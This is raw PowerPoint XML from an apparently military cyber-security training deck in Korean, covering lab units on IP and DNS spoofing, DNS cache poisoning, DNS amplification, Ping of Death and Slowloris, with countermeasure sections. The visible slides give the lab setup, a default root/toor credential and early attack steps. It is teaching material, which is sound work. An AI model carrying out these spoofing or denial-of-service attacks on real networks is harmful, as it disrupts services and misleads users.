              <a:rPr lang="en-US" altLang="ko-KR" sz="10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참고로 공격자는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.bad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도메인에 대한 네임 서버를 가지고 있다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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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toor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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1" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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- DNS Cache Poisoning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공격을 수행할 수 있다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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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- DNS Cache Poisoning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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0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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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DNS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서버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: Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Lubuntu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공격 서버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: Linux (Kali)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC6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01" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="463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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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6795841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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 캡처 도구인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 패킷 캡처 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Application -&gt; 09 – Sniffing &amp; Spoofing -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>더블 클릭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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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 marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 쿼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 확인하기 위하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 일부 호스트의 주소 조회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> www.navy.ac.kr 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 www.navy.ac.kr </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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8193" name="_x48552432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F2CEAC-A054-4028-9C6C-02F4767B10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5146" y="926756"/>
            <a:ext cx="3411538" cy="2989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5" name="_x197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064748F7-B3EE-4002-BEEE-371CF25FDF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" t="15539" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350586" y="4333103"/>
            <a:ext cx="3699863" cy="2050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7" name="_x197190272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F48267-B84B-4D61-B29B-A4EF960150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316"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7900086" y="1338649"/>
            <a:ext cx="2403475" cy="928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9" name="_x197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D839C98-B0AF-4E88-B2F1-A98E8D9DF1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638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6967378" y="2412204"/>
            <a:ext cx="4362450" cy="2033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8643CADF-ABB5-484B-9E24-87FFB6DEB086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6320247" y="4594322"/>
          <a:ext cx="5328158" cy="736600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3611293521"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696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>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc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</a:rPr>
                        <a:t>!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4465211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="167640" marR="0" indent="-16764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※ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>오염시킬 호스트에 미리 접속하면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실제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IP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주소가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DNS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서버에 </a:t>
                      </a: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캐싱되므로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kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격을 성공시킬 수 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0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</a:rPr>
                        <a:t>!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63752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340571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31166</TotalTime>
  <Words>3054</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>793</Paragraphs>
  <Slides>47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47</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/11  11. DNS Spoofing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/Training/Unit/Net/11  11. DNS Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/14  14. DDOS – DNS Amplification</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/14  14. DDOS – DNS Amplification</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/15  15. DDOS - Slowloris</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/15  15. DDOS - Slowloris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국방 사이버 보안</dc:title>
  <dc:creator>Author</dc:creator>
  <cp:lastModifiedBy>Author</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-09T23:57:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-25T23:08:35Z</dcterms:modified>
</cp:coreProperties>
</file>